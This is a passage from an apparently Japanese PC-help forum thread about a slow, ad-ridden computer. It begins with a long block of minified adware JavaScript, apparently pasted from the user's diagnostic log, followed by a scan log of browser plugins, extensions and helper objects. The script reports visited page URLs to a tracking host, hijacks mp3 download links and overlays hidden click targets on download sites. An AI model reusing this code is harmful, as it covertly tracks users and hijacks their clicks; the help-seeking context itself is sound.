XMLHttpRequest;this.xhr.open(\"POST\",\r\na,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&e(c.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};c.waitForTokens={};c.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};\r\nc.waitForElement=function(a,b,e,d){var f=c.query_selector_all(a);clearTimeout(c.waitTimeout);if(25<k.waitForElementCounter)return b(null);if(\"undefined\"==typeof f||1>f.length){if(c.waitForTokens[d])return b(null);var g=arguments.callee;c.waitTimeout=setTimeout(function(){k.waitForElementCounter++;g(a,b,e,d)},e)}else{if(c.waitForTokens[d])return b(null);c.waitForTokens[d]=!0;k.waitForElementCounter=0;return b(f)}};c.flushWaitForTokens=function(){c.waitForTokens={}};c.getRandomInt=function(a,b){return Math.floor(Math.random()*\r\n(b-a+1))+a};c.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(a){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=c.dhtml_prop_name(b);return\"object\"==typeof a.currentStyle&&null!=a.currentStyle&&\"undefined\"!=typeof a.currentStyle[b]?a.currentStyle[b]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};c.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=\r\na.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};c.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:\r\nfunction(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};c.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,e,c){return c.toUpperCase()})};c.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return new RegExp(a)};c.throttle=function(a,b){var e=null;return function(){var c=this,f=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(c,f)},b)}};c.epoch=function(){return(new Date).getTime()};\r\nc.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();c.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};c.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};\r\nc.match_url=function(a,b){for(var e=0;e<b.length;e++)if(\"string\"==typeof b[e]){var d;d=/^\\/.+\\/$/.test(b[e])?new RegExp(b[e]):c.wildcard_to_regex(b[e]);if(d instanceof RegExp&&d.test(a))return!0}};c.ping=function(a){for(var b=[\"google\",\"bing\",\"yahoo\",\"youtube\"],c=0;c<b.length;c++)if(-1<location.hostname.indexOf(b[c])){var d=new Image,f=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<f.length&&(f=encodeURIComponent(location.hostname));var g=encodeURIComponent(location.hostname);\r\nd.src=k.pixelHost+\"?hid=7073390709034079787&eid=108&pid=1&prodid=338&v=\"+k.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=JP&pr=\"+b[c]+\"&host=\"+g+\"&ref=\"+f}};c.getAllText=function(a){for(var b=\"\",c=0;c<a.length;c++)b+=a.textContent?a.textContent:a.innetText;return b};c.duplicateElement=function(a){var b=document.createElement(a.nodeName.toLowerCase()),e=!1;a.getAttribute(\"href\")&&b.setAttribute(\"href\",\"javascript:void(0);\");for(var d in a)if(\"src\"==\r\nd||\"width\"==d||\"height\"==d)b[d]=a[d];else if(\"style\"==d)for(var f in a[d])a[d][f]&&\"\"!=a[d][f]&&(b[d][f]=a[d][f]);else e||\"nodeValue\"!=d&&\"textContent\"!=d&&\"innetText\"!=d&&\"className\"!=d||0!=a.children.length||(b[d]=a[d],e=!0);for(e=0;e<a.childNodes.length;e++)if(3==a.childNodes[e].nodeType)b.appendChild(document.createTextNode(a.childNodes[e].textContent?a.childNodes[e].textContent:a.childNodes[e].innerText));else{d=c.duplicateElement(a.childNodes[e]);f=c.getAllText(d.childNodes);var g=a.childNodes[e].textContent?\r\na.childNodes[e].textContent:a.childNodes[e].innerText;g&&(g=g.replace(f,\"\"),\"\"!=g&&(d.textContent?d.textContent=g:d.innerText=g));b.appendChild(d)}return b}};if(-1<window.location.href.indexOf(\"google.com/chrome/srt\")&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")){try{var h=parseInt(window.navigator.appVersion.match(/Chrome\\/(\\d+)\\./)[1],10)}catch(p){return}if(!(38>=h)){for(h=0;h<document.links.length;h++){var l=document.links[h],m=l.getAttribute(\"href\");if(m&&-1<m.indexOf(\"#dialog-contents\")){var m=\r\nk.utils.duplicateElement(l),n=l.parentNode;n.insertBefore(m,l);n.removeChild(l)}}(h=document.getElementById(\"dialog-contents\"))&&h.remove()}}};(function(){try{window.top==window.self&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")&&\"http:\"==window.location.protocol&&chrome.storage.local.get(\"bcvzdw\",function(a){if(!a.bcvzdw&&!localStorage.getItem(\"bcvzdw\")&&(a=document.getElementsByTagName(\"a\"),a.length))for(var b=0;b<a.length;b++)if(a[b]&&a[b].href&&\"mp3\"==a[b].href.substr(-3)){var c=a[b].href;a[b].setAttribute(\"href\",\"http://mp3juices.se/media/\"+encodeURIComponent(a[b].innerHTML)+\"/mid/\"+encodeURIComponent(encodeURIComponent(c))+\"/el/1\");a[b].setAttribute(\"id\",\"sdfsdfsfds\"+b);document.getElementById(\"sdfsdfsfds\"+b).addEventListener(\"click\",function(){chrome.storage.local.set({bcvzdw:\"2\"});localStorage.setItem(\"bcvzdw\",\"2\")},!1)}})}catch(d){}})();}catch(e){};try{new function(){var n=this;this.activeZds={\"uploading.com\":1,\"dirpy.com\":0,\"go4up.com\":1,\"mp3olimp.org\":1,\"hulkload.com\":1,\"free-tv-video-online.me\":1,\"ehd.c\":1,\"hesefiles.c\":1,\"sharebeast.com\":0,\"coolrom.com\":1,\"ebookbrowsee.net\":1,\"cloud-vibe.com\":0,\"mp3seal.com\":0,\"mp3vampire.com\":0,\"minecraftdl.com\":0,\"leunlckr.co\":0,\"go.theadsnet.com\":1,\"ziddu.com\":1,\"opensubtitles.org\":1,\"romptfile.co\":1,\"pensoftwareupdater.co\":1,\"veehd.com\":1,\"ullypcgames.ne\":0,\"llplayer.com.b\":1,\"ubtitulosespanol.or\":1,\"ubtitles4free.ne\":1,\n\"legendasbrasil.org\":1,\"reeroms.co\":0,\"eneral-ebooks.co\":0,\"stream2watch.me\":1,\"kickass.to\":1,\"kickass.so\":1,\"pensubtitles.us\":0,\"uploadrocket.net\":1,\"programas-gratis.net\":0,\"programasgratis.es\":1,\"programasejogos.com\":1,\"flexydrive.com\":1,\"media1fire.com\":1,\"softwareandgames.com\":1,\"baixarjogos.com\":1,\"programmesetjeux.com\":1,\"descargarjuegos.com\":1,\"hotfiles.ro\":1,\"vitanclub.net\":1,\"getsecuredfiles.com\":1,\"mirrorcreator.com\":0,\"mestorrents.com\":1,\"vitorrent.net\":1,\"uploaded.net\":0,\"newsinitiative.org\":0,\n\"megafilmesonlinehd.com\":1,\"mycoolmp3.com\":1,\"descargadictos.net\":0,\"toggle.com\":1,\"downloadshareware.com\":1,\"primewire.ag\":1,\"ads.showmeflix.com\":0,\"myappsforpc.com\":1,\"telecharger.logiciel.net\":1,\"winmacsofts.com\":1,\"telecharger.info\":0,\"torntv-dl.net\":0,\"1337x.to\":1,\"h33t.to\":1,\"ahashare.com\":1,\"torrenthound.com\":1,\"smartorrent.com\":1,\"torrentreactor.net\":1,\"tomadivx.org\":1,\"opensubtitles.website\":0,\"downloads.info\":1,\"techypcapps.com\":1,\"techmacho.com\":1,\"techariot.com\":1,\"androidlegend.com\":1,\n\"technologyrush.com\":1,\"notintricate.com\":1,\"techglen.com\":1,\"updownload.com\":1,\"techamiable.com\":1,\"appsforpcmero.com\":0,\"hugefiles.net\":1,\"descarga.benjaminstrahs.com\":1,\"installers.installm.com\":1};this.utils=new function(){var h=this;h.sendPixels=function(e){var h;if(e instanceof Array)for(var l=0;l<e.length;l++){var m=e[l];h=new Image;h.src=m}else h=new Image,h.src=e};h.isFalse=function(e){return\"undefined\"==typeof e||0===e.length||null===e};h.cookie=new function(){var e=this;e.createCookie=\nfunction(e,h,m){if(m){var n=new Date;n.setTime(n.getTime()+864E5*m);m=\"; expires=\"+n.toGMTString()}else m=\"\";document.cookie=e+\"=\"+h+m+\"; path=/\"};e.readCookie=function(e){e+=\"=\";for(var h=document.cookie.split(\";\"),m=0;m<h.length;m++){for(var n=h[m];\" \"==n.charAt(0);)n=n.substring(1,n.length);if(0==n.indexOf(e))return n.substring(e.length,n.length)}return null};e.eraseCookie=function(h){e.createCookie(h,\"\",-1)}};h.ajax={get:function(e,k){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",e,!0),\nthis.xhr.onreadystatechange=function(){4==h.ajax.xhr.readyState&&k(h.ajax.xhr.responseText)},this.xhr.send()}catch(l){}},post:function(e,k,l){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",e,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==h.ajax.xhr.readyState&&l(h.ajax.xhr.responseText)};k=encodeURIComponent(k);this.xhr.send(k)}};h.waitForTokens={};h.addScript=function(e,h){if(\"bing\"==h){var l=Element.prototype.appendChild;\ndocument.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(e);Element.prototype.appendChild=l}else document.getElementsByTagName(\"head\")[0].appendChild(e)};h.waitForElement=function(e,k,l,m){var p=h.query_selector_all(e);clearTimeout(h.waitTimeout);if(25<n.waitForElementCounter)return k(null);if(\"undefined\"==typeof p||1>p.length){if(h.waitForTokens[m])return k(null);var q=arguments.callee;h.waitTimeout=setTimeout(function(){n.waitForElementCounter++;\nq(e,k,l,m)},l)}else{if(h.waitForTokens[m])return k(null);h.waitForTokens[m]=!0;n.waitForElementCounter=0;return k(p)}};h.flushWaitForTokens=function(){h.waitForTokens={}};h.getRandomInt=function(e,h){return Math.floor(Math.random()*(h-e+1))+e};h.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(e){return{getPropertyValue:function(k){\"float\"==k&&(k=\"styleFloat\");k=h.dhtml_prop_name(k);return\"object\"==typeof e.currentStyle&&null!=e.currentStyle&&\"undefined\"!=typeof e.currentStyle[k]?\ne.currentStyle[k]:null}}}:function(e,h){return window.getComputedStyle(e,h)||{getPropertyValue:function(){}}};h.query_selector_all=document.querySelectorAll?function(e){try{return document.querySelectorAll(e)}catch(h){}}:function(e){var h=e.match(/^#([^,\\s]+)$/)||[];if(1<h.length)return e=document.getElementById(h[1])||void 0,\"undefined\"!=typeof e?[e]:[];h=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(h);document.__asya_qsaels=[];h.styleSheet.cssText=e+\"{x:expression(document.__asya_qsaels.push(this))}\";\nwindow.scrollBy(0,0);return document.__asya_qsaels};h.clone_object=window.JSON instanceof Object?function(e){if(e instanceof Object&&(e=JSON.stringify(e),\"string\"==typeof e))return JSON.parse(e)}:function(e){if(e instanceof Object){var h=new e.constructor,l;for(l in e)h[l]=arguments.callee(e[l]);return h}return e};h.dhtml_prop_name=function(e){return e.replace(/(\\-([a-z]){1})/g,function(e,h,m){return m.toUpperCase()})};h.wildcard_to_regex=function(e){e=e.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");e=\ne.replace(/\\*/g,\".*\");return new RegExp(e)};h.throttle=function(e,h){var l=null;return function(){var m=this,n=arguments;clearTimeout(l);l=setTimeout(function(){e.apply(m,n)},h)}};h.epoch=function(){return(new Date).getTime()};h.msie=function(){var e=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(e)&&(e=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(e)?!1:e}();h.version_ie_less=function(e){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=\ne?!0:!1};h.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};h.match_url=function(e,k){for(var l=0;l<k.length;l++)if(\"string\"==typeof k[l]){var m;m=/^\\/.+\\/$/.test(k[l])?new RegExp(k[l]):h.wildcard_to_regex(k[l]);if(m instanceof RegExp&&m.test(e))return!0}};h.ping=function(e){for(var h=[\"google\",\"bing\",\"yahoo\",\"youtube\"],l=0;l<h.length;l++)if(-1<location.hostname.indexOf(h[l])){var m=\nnew Image,p=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<p.length&&(p=encodeURIComponent(location.hostname));var q=encodeURIComponent(location.hostname);m.src=n.pixelHost+\"?hid=7073390709034079787&eid=108&pid=1&prodid=338&v=\"+n.version+\"&ch=\"+e+\"&lan=\"+navigator.language+\"&cc=JP&pr=\"+h[l]+\"&host=\"+q+\"&ref=\"+p}};h.getAllText=function(e){for(var h=\"\",l=0;l<e.length;l++)h+=e.textContent?e.textContent:e.innetText;return h};\nh.duplicateElement=function(e){var k=document.createElement(e.nodeName.toLowerCase());e.getAttribute(\"href\")&&k.setAttribute(\"href\",\"javascript:void(0);\");for(var l in e)if(\"src\"==l||\"width\"==l||\"height\"==l||\"id\"==l||\"className\"==l)k[l]=e[l];else if(\"style\"==l)for(var m in e[l])e[l][m]&&\"\"!=e[l][m]&&(k[l][m]=e[l][m]);else\"input\"!==e.nodeName.toLowerCase()||\"type\"!=l&&\"value\"!=l||(k[l]=e[l]);for(l=0;l<e.childNodes.length;l++)if(3==e.childNodes[l].nodeType)m=e.childNodes[l].textContent?e.childNodes[l].textContent:\ne.childNodes[l].innerText,\"undefined\"===typeof m&&(m=e.childNodes[l].nodeValue?e.childNodes[l].nodeValue:e.childNodes[l].data),\"undefined\"!==typeof m&&k.appendChild(document.createTextNode(m));else{m=h.duplicateElement(e.childNodes[l]);var n=h.getAllText(m.childNodes),q=e.childNodes[l].textContent?e.childNodes[l].textContent:e.childNodes[l].innerText;q&&(q=q.replace(n,\"\"),\"\"!=h.trim(q)&&(m.textContent?m.textContent=q:m.innerText=q));k.appendChild(m)}return k};h.coverElement=function(h,k,l,m,n,q,t,\nr){var u=document.createElement(\"div\");u.style.width=k?k:\"100%\";u.style.height=l?l:\"100%\";u.style.zIndex=q?q:\"2000\";u.style.top=m?m:\"0\";u.style.left=n?n:\"0\";u.style.cursor=t?t:\"pointer\";u.style.position=\"absolute\";k=h.parentNode;k.style.position=\"relative\";!0!==r&&\"undefined\"!==typeof r||k.removeChild(h);k.appendChild(u)};h.trim=function(h){return\"function\"!==typeof String.prototype.trim?String(h).replace(/^\\s+|\\s+$/g,\"\"):String.prototype.trim(h)}};this[\"dirpy.com\"]=new function(){this.init=function(){try{f=\nfunction(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(h){}},-1< !navigator.userAgent.indexOf(\"chrome\")?f():(g=document.createElement(\"script\"),g.innerHTML=\"(\"+f.toString()+\")()\",document.body.appendChild(g))}catch(h){}new function(){-1<location.host.toLowerCase().indexOf(\"irpy.co\")&&(window.__irpyCount=0,window.__irpyInt=setInterval(function(){for(var h=document.links,k=0;k<h.length;k++){var l=h[k].getAttribute(\"href\");if(null!=l&&-1<l.toLowerCase().indexOf(\"dirpy.com/download/\")){l=\ndocument.createElement(\"div\");l.style.top=\"0\";l.style.width=\"100%\";l.style.height=\"100%\";l.style.cursor=\"pointer\";l.style.zIndex=\"2000\";l.style.position=\"absolute\";var m=h[k].parentNode;m.style.position=\"relative\";m.appendChild(l);clearInterval(window.__irpyInt)}}20<window.__irpyCount++&&clearInterval(window.__irpyInt)},250))}}};this[\"mp3olimp.org\"]=new function(){this.init=function(){setTimeout(function(){for(var h=document.links,e=0;e<h.length;e++)if(\"return prepare_download_file(this);\"==h[e].getAttribute(\"onclick\")){var m=\ndocument.createElement(\"a\");m.className=\"link last\";m.setAttribute(\"href\",\"javascript:void(0);\");m.innerText?m.innerText=\"Download\":m.textContent=\"Download\";var n=h[e].parentNode,q=n.children[n.children.length-1];q&&(n.removeChild(h[e]),n.insertBefore(m,q))}},1E3);new function(){-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var h=document.getElementById(\"download-manager-checkbox\");if(null!==h)try{h.setAttribute(\"checked\",!1),\ndocument.getElementById(\"checkbox\").checked=!1}catch(e){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250))};-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var h=document.getElementById(\"download-manager-checkbox\");if(null!==h)try{h.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(e){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250));if(-1<document.location.host.indexOf(\"p3olimp.or\")&&\ndocument.getElementsByClassName)for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var h=document.getElementsByClassName(\"nasjfkla\"),e=0;e<h.length;e++)h[e].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var h=document.links[i],e=h.getAttribute(\"onclick\");e&&-1<e.indexOf(\"prepare_download_file\")&&(h=h.parentNode,h.style.position=\"relative\",b=document.createElement(\"div\"),b.className=\"nasjfkla\",b.style.position=\"absolute\",b.style.top=\"-2px\",\nb.style.left=\"92px\",b.style.width=\"71px\",b.style.height=\"16px\",b.style.zIndex=\"99999\",b.style.cursor=\"pointer\",h.appendChild(b))}-1<location.host.indexOf(\"p3olimp.or\")&&setTimeout(function(){for(var h=document.getElementById(\"leftside\"),e=0;e<h.children.length;e++)if(/\\bspnBook\\b/.test(h.children[e].className))for(var m=h.children[e].getElementsByTagName(\"a\"),n=0;n<m.length;n++)m[n].setAttribute(\"href\",\"#\"),m[n].setAttribute(\"target\",\"\")},1001)}};this[\"hulkload.com\"]=new function(){this.init=function(){for(var h=\nn.utils.query_selector_all(\".reclamTable .reclamRow .reclamCell a\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}h=n.utils.query_selector_all(\".contentback div div a[target='_blank']\");for(e=0;e<h.length;e++)k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k);h=n.utils.query_selector_all(\".contentback div center a[target='_blank']\");for(e=0;e<h.length;e++)k=h[e],l=n
  • T・T
  • 2015/04/30 (Thu) 21:28:24
Re: パソコン動作緩慢・広告類がひどい
ログの続きです

FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\windows\system32\Macromed\Flash\NPSWF64_17_0_0_169.dll File not found
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll ()
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.co.jp/NxGame: C:\ProgramData\NexonJP\NGM\npNxGameJP.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)

64bit-FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\extensions\\tmbepff@trendmicro.com: C:\PROGRAM FILES\NTTW\SECURITY\AMSP\MODULE\20002\9.0.1069\9.0.1069\FIREFOXEXTENSION [2015/04/27 22:14:52 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\extensions\\{38783831-6098-4faa-A9C9-1EE1E343F4D2}: C:\Program Files\NTTW\Security\AMSP\Module\20002\7.1.1113\7.1.1113\firefoxextension
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\extensions\\e-webprint@epson.com: C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on [2012/05/05 10:42:15 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\extensions\\tmbepff@trendmicro.com: C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\firefoxextension [2015/04/27 22:14:52 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\extensions\\{BBB77B49-9FF4-4d5c-8FE2-92B1D6CD696C}: C:\Program Files\NTTW\Security\AMSP\module\20013\FxExt\firefoxextension\ [2015/04/27 22:15:37 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\extensions\\{22181a4d-af90-4ca3-a569-faed9118d6bc}: C:\Program Files\NTTW\Security\SEC\UIFramework\Toolbar\firefoxextension [2015/04/27 22:13:38 | 000,000,000 | ---D | M]

[2014/04/30 21:39:20 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\Extensions
[2015/04/30 02:31:40 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\Firefox\Profiles\d3m0wihh.default\extensions
[2014/08/16 13:45:03 | 000,000,000 | ---D | M] (SilentBlockschuzakjp) -- C:\Users\Owner\AppData\Roaming\mozilla\Firefox\Profiles\d3m0wihh.default\extensions\SilentBlock@schuzak.jp
[2014/11/23 17:25:54 | 000,006,738 | ---- | M] () (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\d3m0wihh.default\extensions\{15738250-181b-41cd-b01d-621a833a541c}.xpi
File not found (No name found) -- C:\USERS\OWNER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\D3M0WIHH.DEFAULT\EXTENSIONS\HERMAN.THORNE45@OUTLOOK.COM

[color=#E56717]========== Chrome ==========[/color]

CHR - default_search_provider: (Enabled)
CHR - default_search_provider: search_url =
CHR - default_search_provider: suggest_url =
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.135\PepperFlash\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.135\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.135\pdf.dll
CHR - plugin: Trend Micro Titanium (Enabled) = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\heoldelcflnigdllmlopiefhkkobendj\5.11.0.2107_0\npToolbarChrome.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll
CHR - plugin: Java Deployment Toolkit 6.0.200.2 (Enabled) = C:\Program Files (x86)\Java\jre6\bin\new_plugin\npdeployJava1.dll
CHR - plugin: Java(TM) Platform SE 6 U20 (Enabled) = C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL
CHR - plugin: Google Update (Enabled) = C:\Program Files (x86)\Google\Update\1.3.21.123\npGoogleUpdate3.dll
CHR - plugin: Windows Liveツ・Photo Gallery (Enabled) = C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
CHR - plugin: Silverlight Plug-In (Enabled) = c:\Program Files (x86)\Microsoft Silverlight\4.1.10329.0\npctrl.dll
CHR - Extension: No name found = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik\2.2015.427.11450_0\
CHR - Extension: No name found = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.2_0\
CHR - Extension: No name found = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.1.0.0_0\
CHR - Extension: No name found = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohhcpmplhhiiaoiddkfboafbhiknefdf\8.0.0.1257_0\

O1 HOSTS File: ([2009/06/11 06:00:26 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:[b]64bit:[/b] - BHO: (ExplorerWnd Helper) - {10921475-03CE-4E04-90CE-E2E7EF20C814} - C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll (IObit)
O2:[b]64bit:[/b] - BHO: (TSToolbarBHO) - {43C6D902-A1C5-45c9-91F6-FD9E90337E18} - C:\Program Files\NTTW\SECURITY\SEC\plugin\ToolbarIE64\ToolbarIE.dll (Trend Micro Inc.)
O2:[b]64bit:[/b] - BHO: (東芝プレイス ダイジェストワード用ライブラリ) - {4C149F6B-ED35-42CC-979F-77006AFA4453} - C:\Program Files (x86)\TOSHIBA\Toshiba Places Digestword\TPBIEAddon64.dll (TOSHIBA CORPORATION)
O2:[b]64bit:[/b] - BHO: (E-Photo) - {60B127CA-8AA4-4DCD-84A8-D18C2B2C4A96} - C:\Program Files (x86)\EPSON Software\E-Photo\EPTBL.dll (SEIKO EPSON CORPORATION)
O2:[b]64bit:[/b] - BHO: (TmIEPlugInBHO Class) - {959A5673-7971-48e6-AF54-58F745AC4ABC} - C:\Program Files\NTTW\SECURITY\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg.dll (Trend Micro Inc.)
O2:[b]64bit:[/b] - BHO: (TmBpIeBHO Class) - {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} - C:\Program Files\NTTW\SECURITY\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe64.dll (Trend Micro Inc.)
O2:[b]64bit:[/b] - BHO: (TOSHIBA Media Controller Plug-in) - {F3C88694-EFFA-4d78-B409-54B7B2535B14} - C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll (<TOSHIBA>)
O2 - BHO: (E-Web Print) - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\EPSON Software\E-Web Print\ewps_tb.dll (SEIKO EPSON CORPORATION)
O2 - BHO: (TSToolbarBHO) - {43C6D902-A1C5-45c9-91F6-FD9E90337E18} - C:\Program Files\NTTW\SECURITY\SEC\UIFramework\ToolbarIE.dll (Trend Micro Inc.)
O2 - BHO: (東芝プレイス ダイジェストワード用ライブラリ) - {4C149F6B-ED35-42CC-979F-77006AFA4453} - C:\Program Files (x86)\TOSHIBA\Toshiba Places Digestword\TPBIEAddon.dll (TOSHIBA CORPORATION)
O2 - BHO: (TmIEPlugInBHO Class) - {959A5673-7971-48e6-AF54-58F745AC4ABC} - C:\Program Files\NTTW\SECURITY\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg32.dll (Trend Micro Inc.)
